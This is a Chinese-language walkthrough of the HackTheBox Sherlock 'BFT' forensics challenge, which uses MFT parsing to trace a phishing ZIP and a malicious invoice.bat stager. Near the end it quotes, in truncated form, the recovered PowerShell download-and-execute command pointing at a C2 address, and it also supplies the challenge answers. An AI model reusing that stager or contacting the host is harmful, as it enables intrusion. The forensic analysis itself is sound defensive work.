HTBSherlockBFT
前置:
MFT(Master File Table)是NTFS(NT File System)文件系统中一个非常重要的元数据文件。在使用NTFS的存储设备(如硬盘驱动器或USB闪存盘)上,MFT记录了文件系统中每个文件和目录的信息。这些信息包括但不限于文件名、创建时间、最后一次修改的时间、权限属性、数据的物理位置等
使用MFTEcmd和Timeline exploer来解决这个房间
将MFT文件导出成.csv格式
PS D:\wangan\ctf\sherlock> .\MFTECmd.exe -f '.\$MFT' --csv . --csvf mft.csv |
然后用timeline exploer来打开这个.csv
2 月 13 日,Simon Stark 成为攻击者的目标。他从一封电子邮件中收到的链接下载了一个 ZIP 文件。他从链接中下载的 ZIP 文件的名称是什么?
在extension中搜索zip,有五个结果。锁定事件得到是Stage-20240213T093324Z-001.zip
检查最初下载的 ZIP 文件的区域标识符内容。此字段显示文件下载的 HostUrl,可作为我们调查/分析中有价值的入侵指标 (IOC)。此 ZIP 文件下载的完整主机 URL 是什么?
取消zip搜索,根据最后一次更改进行排序,找到stagez.zip所下载的事件16:34附近,有一个Stage-20240213T093324Z-001.zip:Zone.Identifier
.Identifier是NTFS常见的下载文件时额外的备用数据流,其中包含与下载文件的其他信息
查看
[ZoneTransfer] |
执行恶意代码并连接到 C2 服务器的恶意文件的完整路径和名称是什么?
继续根据修改时间往后看,找到一个解压出来的.bat文件,基本确定是上线的脚本
C:\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices\invoice.bat
分析先前识别的文件的 $Created0x30 时间戳。该文件是在何时在磁盘上创建的?
2024-02-13 16:38:39
在许多调查场景中,找到 MFT 记录的十六进制偏移量都是有益的。从问题 3 中找到暂存文件的十六进制偏移量。
NFTS中每个文件的数据存储在长度为1024字节的记录中,也就是说每个条目(Entry number)的大小为1024字节。那么偏移就是
条目值*1024=23436*1024=16E3000
每个 MFT 记录的大小为 1024 字节。如果磁盘上的文件大小小于 1024 字节,则它们可以直接存储在 MFT 文件本身上。这些文件称为 MFT 驻留文件。在 Windows 文件系统调查期间,查找可能驻留在 MFT 中的任何恶意/可疑文件至关重要。这样我们就可以找到恶意文件/脚本的内容。找到问题 3 中标识的恶意阶段程序的内容,并使用 C2 IP 和端口进行回答。
也就是说要分理出这个.bat文件了,用十六进制编辑器打开MFT文件,我用的是010editor,找到之前偏移的位置,找到
powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://43.204.110.203:6666/download/powershell/Om1hdHRpZmVzdGF |
43.204.110.203:6666